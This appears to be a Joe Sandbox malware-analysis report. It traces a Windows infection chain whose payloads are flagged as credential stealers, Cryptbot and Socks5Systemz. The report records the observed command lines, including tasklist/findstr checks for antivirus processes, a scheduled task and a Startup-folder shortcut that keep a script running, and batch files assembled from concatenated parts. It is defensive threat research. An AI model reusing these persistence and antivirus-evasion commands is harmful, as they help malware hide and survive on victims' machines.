Path:	C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
Imagebase:	0x1e0000
File size:	439'296 bytes
MD5 hash:	C07E06E76DE584BCDDD59073A4161DBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	00:03:14
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
Imagebase:	0x1e0000
File size:	439'296 bytes
MD5 hash:	C07E06E76DE584BCDDD59073A4161DBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:03:21
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"
Imagebase:	0x400000
File size:	1'224'767 bytes
MD5 hash:	5D97C2475C8A4D52E140EF4650D1028B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:03:23
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:03:23
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:03:25
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x9e0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:03:25
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:03:25
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x9e0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:03:26
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:03:26
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 197036
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:03:26
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Imagebase:	0x60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:03:26
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:03:26
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
Wow64 process (32bit):	true
Commandline:	Jurisdiction.pif T
Imagebase:	0x6d0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	00:03:27
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xb50000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:03:27
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	00:03:28
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:03:28
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x260000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	00:03:28
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	00:03:28
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	00:03:29
Start date:	02/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Imagebase:	0x7ff6aec00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	00:03:30
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Imagebase:	0xb0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	00:03:31
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"
Imagebase:	0xe10000
File size:	5'952'512 bytes
MD5 hash:	5009B1EF6619ECA039925510D4FD51A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3004360942.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3007878955.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	00:03:36
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe"
Imagebase:	0x90000
File size:	6'750'208 bytes
MD5 hash:	331990A29AFA36193295A7B63EA4E712
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001F.00000003.3795915109.000000000E2DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001F.00000003.3795915109.000000000E30E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001F.00000003.3384717218.0000000001763000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001F.00000003.3795777106.000000000E30E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	00:03:37
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe"
Imagebase:	0x50000
File size:	526'848 bytes
MD5 hash:	26D8D52BAC8F4615861F39E118EFA28D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	00:03:37
Start date:	02/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Imagebase:	0x7ff6aec00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	00:03:38
Start date:	02/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	00:03:38
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Imagebase:	0xb0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	00:03:55
Start date:	02/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xeb0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	00:03:59
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\10000061101\stail.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Imagebase:	0x400000
File size:	5'520'596 bytes
MD5 hash:	DCF45A3386D6E8A1EFA6B2040125C3CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	00:04:00
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp" /SL5="$404A0,5239339,56832,C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Imagebase:	0x400000
File size:	707'072 bytes
MD5 hash:	AA4C6A433329F72AD8B338F73BAB7738
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	00:04:02
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe" -i
Imagebase:	0x400000
File size:	4'732'416 bytes
MD5 hash:	72DFEB99DAF355DDE1A7CD0482A98954
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000027.00000002.4847975543.0000000002EC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000027.00000002.4844229093.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 46%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	00:04:03
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe"
Imagebase:	0x5e0000
File size:	2'985'984 bytes
MD5 hash:	B00D133C7ED8F6D1FB0C04A1509A4AC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3395409746.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3395777453.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3489158557.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3489034650.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3659374635.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3659725440.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3616953743.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3625699652.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3658829272.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000003.3536995866.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	00:04:10
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Imagebase:	0xc60000
File size:	660'480 bytes
MD5 hash:	BDF3C509A0751D1697BA1B1B294FD579
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	00:04:10
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	00:04:14
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"
Imagebase:	0x700000
File size:	334'848 bytes
MD5 hash:	FBA8F56206955304B2A6207D9F5E8032
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	00:04:18
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Imagebase:	0xc60000
File size:	660'480 bytes
MD5 hash:	BDF3C509A0751D1697BA1B1B294FD579
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000003.3495740575.0000000001549000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3725730938.000000000154F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000003.3519315882.000000000154F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000003.3551155681.000000000154F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	00:04:18
Start date:	02/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	00:04:18
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3280 -ip 3280
Imagebase:	0xad0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	00:04:18
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe"
Imagebase:	0x2a0000
File size:	2'749'952 bytes
MD5 hash:	2BC1796E07C6D66C07E2386051C4F951
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	00:04:18
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 260
Imagebase:	0xad0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 052004B0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4540b37203bfb032da6637e165c9018bb948ffdf3afbf154c93dc7635137ac
Instruction ID: d0f30df9ecbd3b5f6a18abd1ab82b3ffa9d7b46208c0a689809b884f516a429c
Opcode Fuzzy Hash: 4d4540b37203bfb032da6637e165c9018bb948ffdf3afbf154c93dc7635137ac
Instruction Fuzzy Hash: 1221A0EB17E150BDB342C5866AACAF66F2FF9D7230370906BF40389583D1D64A4A5532

Function 052005B3 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea984240b89abe72b8ec0d00ba2d44e5b899a3f48bcf0cbe5557765cc5e042a6
Instruction ID: 222ccce7c7548cb16318f04fe730ce9eceb1e658ec90fda4ea6f666e1ac04f6d
Opcode Fuzzy Hash: ea984240b89abe72b8ec0d00ba2d44e5b899a3f48bcf0cbe5557765cc5e042a6
Instruction Fuzzy Hash: 6E11D0AB17F111AEB302D4571A6CBBA6E2BBDD32303B0A42BF403C65C3D2C58A8D5435

Function 0520062B Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7068c69086e9dc5260ca462010a4f6d06ff36e41e82a6b7d62a85d2e8fed5ffd
Instruction ID: d38739e8fc41aef384d7648a869875bf964ddd211f131a9455704d2003e5dbd9
Opcode Fuzzy Hash: 7068c69086e9dc5260ca462010a4f6d06ff36e41e82a6b7d62a85d2e8fed5ffd
Instruction Fuzzy Hash: 3F11049A56E1406EF302C1421E6CBB66B7FBAD66313B451AFF0428A083D2C6864E9631

Function 052005DC Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc0df7c44b13ed19a64ce7279fd16e3ad54d5e9c32926d7d73e17752b83871b
Instruction ID: b8b5a96840c8735bf1cd1019f192a0c4deba58a56cee8a9fdee8f7d1a57b20db
Opcode Fuzzy Hash: 0cc0df7c44b13ed19a64ce7279fd16e3ad54d5e9c32926d7d73e17752b83871b
Instruction Fuzzy Hash: EE0175EB17E014BD7241C5832B6CBB66A2FE9D63303B0942BF407C5183D2C58E4D5035

Function 052005F5 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa4c3c43176af7eeb59729ce8915ced17782a861e5b085d11691d22be1ae905e
Instruction ID: a6e1164ba361a6372dd47d7011b6c5c1b9e74e42557fc0bedd4831dbfc4201aa
Opcode Fuzzy Hash: fa4c3c43176af7eeb59729ce8915ced17782a861e5b085d11691d22be1ae905e
Instruction Fuzzy Hash: 74018FEB17E114BDB205C5832A6CAB26A2FF9E62303B0A42BF443D1183D2D58A495035

Function 0520060E Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261185ddefbd7d03981266c0fc3d2082ef881e7daaf21998ef0b9ab4d5251bf6
Instruction ID: 7d23f1fbd6e350ecd1dc65b557a84e7e394933c51d94db04c86e410aa9f47216
Opcode Fuzzy Hash: 261185ddefbd7d03981266c0fc3d2082ef881e7daaf21998ef0b9ab4d5251bf6
Instruction Fuzzy Hash: 03F086DB07E011AEB206C2432A6DBF35A2FA9D66303B09427F447D6183D1C54A495031

Function 05200659 Relevance: .1, Instructions: 51COMMON

